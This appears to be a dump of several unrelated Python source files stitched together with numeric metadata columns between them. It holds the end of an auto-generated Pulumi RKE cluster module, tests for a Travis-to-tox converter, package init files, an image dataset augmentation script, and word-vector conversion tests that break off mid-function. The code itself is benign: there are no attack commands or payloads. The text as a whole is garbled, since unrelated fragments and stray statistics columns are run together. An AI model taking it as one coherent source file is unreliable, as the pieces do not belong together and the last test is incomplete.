* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
* `kubeproxy` (`pulumi.Input[dict]`) - Kubeproxy options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `scheduler` (`pulumi.Input[dict]`) - Scheduler options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_etcd_deprecated** object supports the following:
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
The **services_kube_api_deprecated** object supports the following:
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxitem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configuration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
The **services_kube_controller_deprecated** object supports the following:
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
The **services_kube_proxy_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kube_scheduler_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kubelet_deprecated** object supports the following:
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
The **system_images** object supports the following:
* `alpine` (`pulumi.Input[str]`) - Docker image for alpine (string)
* `calicoCni` (`pulumi.Input[str]`) - Docker image for calico_cni (string)
* `calicoControllers` (`pulumi.Input[str]`) - Docker image for calico_controllers (string)
* `calicoCtl` (`pulumi.Input[str]`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`pulumi.Input[str]`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`pulumi.Input[str]`) - Docker image for calico_node (string)
* `canalCni` (`pulumi.Input[str]`) - Docker image for canal_cni (string)
* `canalFlannel` (`pulumi.Input[str]`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`pulumi.Input[str]`) - Docker image for canal_flex_vol (string)
* `canalNode` (`pulumi.Input[str]`) - Docker image for canal_node (string)
* `certDownloader` (`pulumi.Input[str]`) - Docker image for cert_downloader (string)
* `coredns` (`pulumi.Input[str]`) - Docker image for coredns (string)
* `corednsAutoscaler` (`pulumi.Input[str]`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`pulumi.Input[str]`) - Docker image for dnsmasq (string)
* `etcd` (`pulumi.Input[str]`) - Docker image for etcd (string)
* `flannel` (`pulumi.Input[str]`) - Docker image for flannel (string)
* `flannelCni` (`pulumi.Input[str]`) - Docker image for flannel_cni (string)
* `ingress` (`pulumi.Input[str]`) - Docker image for ingress (string)
* `ingressBackend` (`pulumi.Input[str]`) - Docker image for ingress_backend (string)
* `kubeDns` (`pulumi.Input[str]`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`pulumi.Input[str]`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`pulumi.Input[str]`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`pulumi.Input[str]`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`pulumi.Input[str]`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`pulumi.Input[str]`) - Docker image for metrics_server (string)
* `nginxProxy` (`pulumi.Input[str]`) - Docker image for nginx_proxy (string)
* `nodelocal` (`pulumi.Input[str]`) - Docker image for nodelocal (string)
* `podInfraContainer` (`pulumi.Input[str]`) - Docker image for pod_infra_container (string)
* `weaveCni` (`pulumi.Input[str]`) - Docker image for weave_cni (string)
* `weaveNode` (`pulumi.Input[str]`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`pulumi.Input[str]`) - Docker image for windows_pod_infra_container (string)
The **upgrade_strategy** object supports the following:
* `drain` (`pulumi.Input[bool]`) - RKE drain nodes. Default: `false` (bool)
* `drainInput` (`pulumi.Input[dict]`) - RKE drain node input (list Maxitems: 1)
* `deleteLocalData` (`pulumi.Input[bool]`) - Delete RKE node local data. Default: `false` (bool)
* `force` (`pulumi.Input[bool]`) - Force RKE node drain. Default: `false` (bool)
* `gracePeriod` (`pulumi.Input[float]`) - RKE node drain grace period. Default: `-1` (int)
* `ignoreDaemonSets` (`pulumi.Input[bool]`) - Ignore RKE daemon sets. Default: `true` (bool)
* `timeout` (`pulumi.Input[float]`) - RKE node drain timeout. Default: `60` (int)
* `maxUnavailableControlplane` (`pulumi.Input[str]`) - RKE max unavailable controlplane nodes. Default: `1` (string)
* `maxUnavailableWorker` (`pulumi.Input[str]`) - RKE max unavailable worker nodes. Default: `10%` (string)
The **worker_hosts** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["addon_job_timeout"] = addon_job_timeout
__props__["addons"] = addons
__props__["addons_includes"] = addons_includes
__props__["api_server_url"] = api_server_url
__props__["authentication"] = authentication
__props__["authorization"] = authorization
__props__["bastion_host"] = bastion_host
__props__["ca_crt"] = ca_crt
__props__["cert_dir"] = cert_dir
__props__["certificates"] = certificates
__props__["client_cert"] = client_cert
__props__["client_key"] = client_key
__props__["cloud_provider"] = cloud_provider
__props__["cluster_cidr"] = cluster_cidr
__props__["cluster_dns_server"] = cluster_dns_server
__props__["cluster_domain"] = cluster_domain
__props__["cluster_name"] = cluster_name
__props__["cluster_yaml"] = cluster_yaml
__props__["control_plane_hosts"] = control_plane_hosts
__props__["custom_certs"] = custom_certs
__props__["delay_on_creation"] = delay_on_creation
__props__["dind"] = dind
__props__["dind_dns_server"] = dind_dns_server
__props__["dind_storage_driver"] = dind_storage_driver
__props__["disable_port_check"] = disable_port_check
__props__["dns"] = dns
__props__["etcd_hosts"] = etcd_hosts
__props__["ignore_docker_version"] = ignore_docker_version
__props__["inactive_hosts"] = inactive_hosts
__props__["ingress"] = ingress
__props__["internal_kube_config_yaml"] = internal_kube_config_yaml
__props__["kube_admin_user"] = kube_admin_user
__props__["kube_config_yaml"] = kube_config_yaml
__props__["kubernetes_version"] = kubernetes_version
__props__["monitoring"] = monitoring
__props__["network"] = network
__props__["nodes"] = nodes
__props__["nodes_confs"] = nodes_confs
__props__["prefix_path"] = prefix_path
__props__["private_registries"] = private_registries
__props__["restore"] = restore
__props__["rke_cluster_yaml"] = rke_cluster_yaml
__props__["rke_state"] = rke_state
__props__["rotate_certificates"] = rotate_certificates
__props__["running_system_images"] = running_system_images
__props__["services"] = services
__props__["services_etcd_deprecated"] = services_etcd_deprecated
__props__["services_kube_api_deprecated"] = services_kube_api_deprecated
__props__["services_kube_controller_deprecated"] = services_kube_controller_deprecated
__props__["services_kube_proxy_deprecated"] = services_kube_proxy_deprecated
__props__["services_kube_scheduler_deprecated"] = services_kube_scheduler_deprecated
__props__["services_kubelet_deprecated"] = services_kubelet_deprecated
__props__["ssh_agent_auth"] = ssh_agent_auth
__props__["ssh_cert_path"] = ssh_cert_path
__props__["ssh_key_path"] = ssh_key_path
__props__["system_images"] = system_images
__props__["update_only"] = update_only
__props__["upgrade_strategy"] = upgrade_strategy
__props__["worker_hosts"] = worker_hosts
return Cluster(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
    """Map a camelCase provider property name to its snake_case Python
    name; names with no table entry are returned unchanged."""
    snake_name = tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop)
    return snake_name or prop
def translate_input_property(self, prop):
    """Map a snake_case Python property name to the camelCase name the
    provider expects; names with no table entry are returned unchanged."""
    camel_name = tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop)
    return camel_name or prop
| 69.085631
| 1,319
| 0.628166
| 18,043
| 165,391
| 5.673391
| 0.037078
| 0.120139
| 0.088898
| 0.03172
| 0.958394
| 0.950296
| 0.939472
| 0.927524
| 0.912656
| 0.901421
| 0
| 0.005274
| 0.22503
| 165,391
| 2,393
| 1,320
| 69.114501
| 0.793373
| 0.60019
| 0
| 0.009302
| 1
| 0
| 0.153528
| 0.039415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018605
| false
| 0.004651
| 0.027907
| 0.009302
| 0.339535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d2a10154203c862f145df82e6a1e0fbc346c464
| 1,655
|
py
|
Python
|
panci/tests/test_travis2tox.py
|
msabramo/python-panci
|
f5954f9649ed5ee2a026576d3a74ffa1d3155708
|
[
"MIT"
] | 34
|
2015-01-04T12:22:35.000Z
|
2020-10-21T22:51:30.000Z
|
panci/tests/test_travis2tox.py
|
msabramo/python-panci
|
f5954f9649ed5ee2a026576d3a74ffa1d3155708
|
[
"MIT"
] | 11
|
2015-07-18T01:44:11.000Z
|
2019-08-14T05:32:24.000Z
|
panci/tests/test_travis2tox.py
|
msabramo/python-panci
|
f5954f9649ed5ee2a026576d3a74ffa1d3155708
|
[
"MIT"
] | 12
|
2015-02-26T08:55:51.000Z
|
2021-02-14T17:04:48.000Z
|
import six
import unittest
from panci.travis2tox import travis2tox
class TravisToToxCommandsTests(unittest.TestCase):
    """Check that travis2tox copies the shell commands from each Travis CI
    lifecycle section into the generated tox configuration."""

    def _assert_section_commands(self, section):
        """Build a minimal .travis.yml whose *section* holds two echo
        commands and assert travis2tox exposes them as tox commands."""
        travis = '''
language: python
python:
  - 2.7
%s:
  - echo 1
  - echo 2
''' % section
        tox_config = travis2tox(six.StringIO(travis))
        self.assertEqual(tox_config.commands, ['echo 1', 'echo 2'])

    def test_before_install(self):
        self._assert_section_commands('before_install')

    def test_install(self):
        self._assert_section_commands('install')

    def test_after_install(self):
        self._assert_section_commands('after_install')

    def test_before_script(self):
        self._assert_section_commands('before_script')

    def test_script(self):
        self._assert_section_commands('script')

    def test_after_script(self):
        # Bug fix: this test previously built a plain ``script`` section
        # (copy/paste from test_script), so ``after_script`` handling was
        # never actually exercised.
        self._assert_section_commands('after_script')
| 19.244186
| 67
| 0.608459
| 200
| 1,655
| 4.91
| 0.14
| 0.0611
| 0.10998
| 0.1222
| 0.870672
| 0.870672
| 0.870672
| 0.870672
| 0.700611
| 0.700611
| 0
| 0.036007
| 0.261631
| 1,655
| 85
| 68
| 19.470588
| 0.767594
| 0
| 0
| 0.8
| 0
| 0
| 0.318429
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 1
| 0.085714
| false
| 0
| 0.042857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d3728f7084b91f4787a0a0f6080c042eee6e361
| 162
|
py
|
Python
|
soccerpy/__init__.py
|
SlapBot/soccerpy
|
e70cd9bf2ad130f004d85328a83deba0815461bd
|
[
"MIT"
] | null | null | null |
soccerpy/__init__.py
|
SlapBot/soccerpy
|
e70cd9bf2ad130f004d85328a83deba0815461bd
|
[
"MIT"
] | 1
|
2017-07-18T17:04:58.000Z
|
2017-07-19T02:02:46.000Z
|
soccerpy/__init__.py
|
SlapBot/soccerpy
|
e70cd9bf2ad130f004d85328a83deba0815461bd
|
[
"MIT"
] | 1
|
2018-08-17T23:51:31.000Z
|
2018-08-17T23:51:31.000Z
|
from soccerpy.modules.Competition.competition import Competition
from soccerpy.modules.Fixture.fixture import Fixture
from soccerpy.modules.Team.team import Team
| 40.5
| 64
| 0.87037
| 21
| 162
| 6.714286
| 0.333333
| 0.255319
| 0.404255
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 162
| 3
| 65
| 54
| 0.94
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
edb2b0596e1e1cb8ecb027a8f8a50b7e041d19d4
| 130
|
py
|
Python
|
blogstrap/__init__.py
|
joehakimrahme/blogstrap
|
6ff91904065d01ebaf757a51c1483c7f180521c0
|
[
"Apache-2.0"
] | null | null | null |
blogstrap/__init__.py
|
joehakimrahme/blogstrap
|
6ff91904065d01ebaf757a51c1483c7f180521c0
|
[
"Apache-2.0"
] | 13
|
2015-11-16T12:21:50.000Z
|
2020-05-28T08:25:27.000Z
|
blogstrap/__init__.py
|
joehakimrahme/blogstrap
|
6ff91904065d01ebaf757a51c1483c7f180521c0
|
[
"Apache-2.0"
] | 2
|
2015-11-22T09:39:53.000Z
|
2020-11-24T10:35:19.000Z
|
import six

# ``create_app`` lives at a different module path depending on the Python
# major version; import it conditionally so callers can always use
# ``from blogstrap import create_app`` regardless of interpreter.
if six.PY2:
    from blogstrap import create_app  # noqa
else:
    from blogstrap.blogstrap import create_app  # noqa
| 18.571429
| 54
| 0.738462
| 19
| 130
| 4.947368
| 0.526316
| 0.276596
| 0.446809
| 0.510638
| 0.595745
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009804
| 0.215385
| 130
| 6
| 55
| 21.666667
| 0.911765
| 0.069231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
edb99ecc54cb284ed550aebdcbbd6b1175a52d3d
| 2,269
|
py
|
Python
|
scripts/data_argumentation.py
|
JinshuChen/SteelDetection
|
ce8bf4d859591f4d9df30b41bdd69c3331688e8c
|
[
"MIT"
] | 4
|
2019-03-29T09:30:13.000Z
|
2020-05-07T12:42:16.000Z
|
scripts/data_argumentation.py
|
JinshuChen/SteelDetection
|
ce8bf4d859591f4d9df30b41bdd69c3331688e8c
|
[
"MIT"
] | 1
|
2019-10-29T11:18:14.000Z
|
2019-10-29T11:18:14.000Z
|
scripts/data_argumentation.py
|
JinshuChen/SteelDetection
|
ce8bf4d859591f4d9df30b41bdd69c3331688e8c
|
[
"MIT"
] | null | null | null |
import os
from impy.ObjectDetectionDataset import *
# def main():
# # Define the path to images and annotations
# images_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/img"
# annotations_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/annotations"
# # Define the name of the dataset
# dbName = "circle_steel"
# # Create an object of ImageLocalizationDataset
# imda = ObjectDetectionDataset(imagesDirectory = images_path, annotationsDirectory = annotations_path, databaseName = dbName)
# # Reduce the dataset to smaller Rois of smaller ROIs of shape 1032x1032.
# images_output_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/img_adapted"
# annotations_output_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/annotations_adapted"
# imda.reduceDatasetByRois(offset = [640, 640], outputImageDirectory = images_output_path, outputAnnotationDirectory = annotations_output_path)
# if __name__ == "__main__":
# main()
def main(images_path="/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/NHsquare_steel/img_adapted",
         annotations_path="/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/NHsquare_steel/annotations_adapted",
         database_name="NHsquare_steel",
         configuration_file="/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/config2.json",
         images_output_path=None,
         annotations_output_path=None):
    """Apply impy data augmentation to an object-detection dataset.

    Every argument defaults to the previously hard-coded NHsquare_steel
    path, so calling ``main()`` with no arguments behaves exactly as the
    original script did.

    :param images_path: directory holding the input images.
    :param annotations_path: directory holding the annotation files that
        match the images.
    :param database_name: logical name of the dataset.
    :param configuration_file: JSON file describing which augmentations to
        apply (impy configuration format — TODO confirm schema against impy docs).
    :param images_output_path: directory for augmented images; defaults to
        ``images_path`` (in-place, matching the original behavior).
    :param annotations_output_path: directory for augmented annotations;
        defaults to ``annotations_path``.
    """
    if images_output_path is None:
        images_output_path = images_path
    if annotations_output_path is None:
        annotations_output_path = annotations_path
    # ObjectDetectionDataset comes from the star import of
    # impy.ObjectDetectionDataset at the top of the file.
    imda = ObjectDetectionDataset(imagesDirectory=images_path,
                                  annotationsDirectory=annotations_path,
                                  databaseName=database_name)
    # Augment every image/annotation pair according to the configuration
    # and write the results to the output directories.
    imda.applyDataAugmentation(configurationFile=configuration_file,
                               outputImageDirectory=images_output_path,
                               outputAnnotationDirectory=annotations_output_path)


if __name__ == "__main__":
    main()
| 64.828571
| 163
| 0.824152
| 274
| 2,269
| 6.514599
| 0.237226
| 0.02521
| 0.070588
| 0.080672
| 0.817927
| 0.817927
| 0.817927
| 0.783193
| 0.783193
| 0.783193
| 0
| 0.007264
| 0.089907
| 2,269
| 35
| 164
| 64.828571
| 0.857143
| 0.534156
| 0
| 0
| 0
| 0
| 0.477295
| 0.456039
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.153846
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6a4e1060401e8fa16df2b9458777ae26a4cfd86
| 7,685
|
py
|
Python
|
tests/test_convert.py
|
blester125/word-vectors
|
4f6d8b2b6d8b87fad453a37000c6d0d236a6cb96
|
[
"MIT"
] | 1
|
2018-07-06T08:37:34.000Z
|
2018-07-06T08:37:34.000Z
|
tests/test_convert.py
|
blester125/word-vectors
|
4f6d8b2b6d8b87fad453a37000c6d0d236a6cb96
|
[
"MIT"
] | 5
|
2020-04-24T13:21:10.000Z
|
2020-06-23T19:45:51.000Z
|
tests/test_convert.py
|
blester125/word_vectors
|
4f6d8b2b6d8b87fad453a37000c6d0d236a6cb96
|
[
"MIT"
] | null | null | null |
import os
import random
import pathlib
from unittest.mock import patch
import numpy as np
from word_vectors import FileType
from word_vectors.read import read
from word_vectors.convert import convert
from utils import vocab, vectors, DATA, GLOVE, W2V, W2V_TEXT, LEADER, rand_str
# Map each fixture file name to the FileType enum member describing its
# on-disk format; used to pass an explicit ``input_file_type`` to convert.
INPUT_MAPPING = {
    GLOVE: FileType.GLOVE,
    W2V: FileType.W2V,
    W2V_TEXT: FileType.W2V_TEXT,
    LEADER: FileType.LEADER,
}
def test_convert():
    """When no output path is given, write targets the input path with a new suffix."""
    source = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    target_format = random.choice(list(FileType))
    source_path = str(DATA / source)
    base, _ = os.path.splitext(source_path)
    expected_path = base + "." + str(target_format)
    with patch("word_vectors.convert_module.write") as write_patch:
        words, vecs = read(source_path)
        convert(source_path, output_file_type=target_format)
        out_file, out_words, out_vecs, out_type = write_patch.call_args_list[0][0]
        assert out_file == expected_path
        assert out_words == words
        np.testing.assert_allclose(out_vecs, vecs)
        assert out_type is target_format
def test_convert_with_output():
    """An explicit output path is forwarded to write unchanged."""
    source = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    target_format = random.choice(list(FileType))
    destination = rand_str()
    source_path = str(DATA / source)
    with patch("word_vectors.convert_module.write") as write_patch:
        words, vecs = read(source_path)
        convert(source_path, destination, output_file_type=target_format)
        out_file, out_words, out_vecs, out_type = write_patch.call_args_list[0][0]
        assert out_file == destination
        assert out_words == words
        assert out_type == target_format
        np.testing.assert_allclose(out_vecs, vecs)
def test_convert_with_input():
    """An explicit input file type is passed straight through to read."""
    source = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    source_format = INPUT_MAPPING[source]
    target_format = random.choice(list(FileType))
    source_path = str(DATA / source)
    destination = rand_str()
    with patch("word_vectors.convert_module.read") as read_patch:
        with patch("word_vectors.convert_module.write") as write_patch:
            words, vecs = read(source_path)
            read_patch.return_value = (words, vecs)
            convert(source_path, destination, output_file_type=target_format, input_file_type=source_format)
            read_patch.assert_called_once_with(source_path, source_format)
            out_file, out_words, out_vecs, out_type = write_patch.call_args_list[0][0]
            assert out_file == destination
            assert out_words == words
            assert out_type == target_format
            np.testing.assert_allclose(out_vecs, vecs)
def test_convert_pathlib():
    """The default output path is derived correctly from a pathlib.Path input."""
    source = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    target_format = random.choice(list(FileType))
    source_path = DATA / source
    base, _ = os.path.splitext(str(source_path))
    expected_path = base + "." + str(target_format)
    with patch("word_vectors.convert_module.write") as write_patch:
        words, vecs = read(source_path)
        convert(source_path, output_file_type=target_format)
        out_file, out_words, out_vecs, out_type = write_patch.call_args_list[0][0]
        assert str(out_file) == expected_path
        assert out_words == words
        np.testing.assert_allclose(out_vecs, vecs)
        assert out_type is target_format
def test_convert_with_output_pathlib():
    """An explicit pathlib.Path output is handed to write unchanged."""
    source = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    target_format = random.choice(list(FileType))
    destination = pathlib.Path(rand_str())
    source_path = DATA / source
    with patch("word_vectors.convert_module.write") as write_patch:
        words, vecs = read(source_path)
        convert(source_path, destination, output_file_type=target_format)
        out_file, out_words, out_vecs, out_type = write_patch.call_args_list[0][0]
        assert out_file == destination
        assert out_words == words
        assert out_type == target_format
        np.testing.assert_allclose(out_vecs, vecs)
def test_convert_with_input_pathlib():
    """Explicit input type plus pathlib paths flow through read and write intact."""
    source = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    source_format = INPUT_MAPPING[source]
    target_format = random.choice(list(FileType))
    source_path = DATA / source
    destination = pathlib.Path(rand_str())
    with patch("word_vectors.convert_module.read") as read_patch:
        with patch("word_vectors.convert_module.write") as write_patch:
            words, vecs = read(source_path)
            read_patch.return_value = (words, vecs)
            convert(source_path, destination, output_file_type=target_format, input_file_type=source_format)
            read_patch.assert_called_once_with(source_path, source_format)
            out_file, out_words, out_vecs, out_type = write_patch.call_args_list[0][0]
            assert out_file == destination
            assert out_words == words
            assert out_type == target_format
            np.testing.assert_allclose(out_vecs, vecs)
def test_convert_open():
    """convert accepts an already-open input handle and still derives the default output path."""
    source = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    target_format = random.choice(list(FileType))
